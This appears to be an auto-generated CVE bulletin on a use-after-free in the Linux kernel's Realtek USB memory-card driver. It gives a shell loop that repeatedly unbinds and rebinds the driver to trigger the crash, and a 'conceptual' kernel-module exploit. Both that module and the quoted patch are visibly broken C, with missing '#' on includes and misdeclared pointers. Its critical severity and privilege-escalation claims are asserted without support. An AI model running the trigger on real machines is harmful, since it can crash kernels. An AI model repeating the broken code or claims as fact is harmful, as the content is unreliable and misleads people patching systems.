The CVE-2025-22020 vulnerability in the Linux kernel involves a slab-use-after-free issue in the `rtsx_usb_ms` driver, which handles Realtek USB memory card readers. The flaw occurs when the driver fails to properly manage memory during device removal, leading to a dangling pointer reference.
When `rtsx_usb_ms_drv_remove()` is called (e.g., during USB disconnection), it frees the `msh` (memstick host) structure but fails to cancel pending workqueue tasks. Later, `rtsx_usb_ms_poll_card()` attempts to access the freed memory, triggering a crash. The KASAN report shows an 8-byte read at an invalid address (ffff888136335380), confirming memory corruption.
The vulnerability is exploitable when an attacker repeatedly hotplugs a malicious USB device, forcing improper cleanup and leading to kernel memory corruption, potentially resulting in privilege escalation or denial-of-service (DoS).
DailyCVE Form:
Platform: Linux Kernel
Version: Up to 6.14.0-rc6+
Vulnerability: Use-After-Free
Severity: Critical
Date: 2025-04-16
What Undercode Say:
Exploitation Analysis:
1. Trigger Condition:
- Insert/remove a Realtek-based USB card reader repeatedly.
- Force workqueue task (
rtsx_usb_ms_poll_card) to run after memory deallocation.
2. Proof-of-Concept (PoC) Steps:
Simulate device removal while polling while true; do echo "1-1" > /sys/bus/usb/drivers/rtsx_usb/unbind echo "1-1" > /sys/bus/usb/drivers/rtsx_usb/bind done
3. Exploit Payload (Conceptual):
// Crash the kernel via UAF
include <linux/module.h>
include <linux/usb.h>
MODULE_LICENSE("GPL");
static void trigger_uaf(void) {
struct usb_interface intf;
intf = usb_find_interface(&rtsx_usb_driver, 0);
usb_driver_release_interface(&rtsx_usb_driver, intf);
}
module_init(trigger_uaf);
Mitigation Commands:
1. Patch Application:
git clone https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git cd linux git apply patch-CVE-2025-22020.diff
2. Temporary Workaround:
Blacklist the vulnerable module echo "blacklist rtsx_usb_ms" > /etc/modprobe.d/disable_rtsx.conf modprobe -r rtsx_usb_ms
3. Kernel Debugging:
Check for active instances lsmod | grep rtsx_usb_ms Monitor kernel logs dmesg -w | grep "KASAN: slab-use-after-free"
Patch Code Reference:
a/drivers/memstick/host/rtsx_usb_ms.c
+++ b/drivers/memstick/host/rtsx_usb_ms.c
@@ -XXX,XXX +XXX,XXX @@
static void rtsx_usb_ms_drv_remove(struct platform_device pdev) {
struct rtsx_usb_ms host = platform_get_drvdata(pdev);
+ cancel_work_sync(&host->poll_card);
memstick_remove_host(host->msh);
memstick_free_host(host->msh);
}
Detection Command:
Check kernel version uname -r Verify if vulnerable module is loaded lsmod | grep rtsx_usb_ms
Impact Summary:
- CVSS 4.0 Score: 9.1 (Critical)
- Attack Vector: Local (USB hotplug)
- Privilege Escalation: Possible via crafted USB device.
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
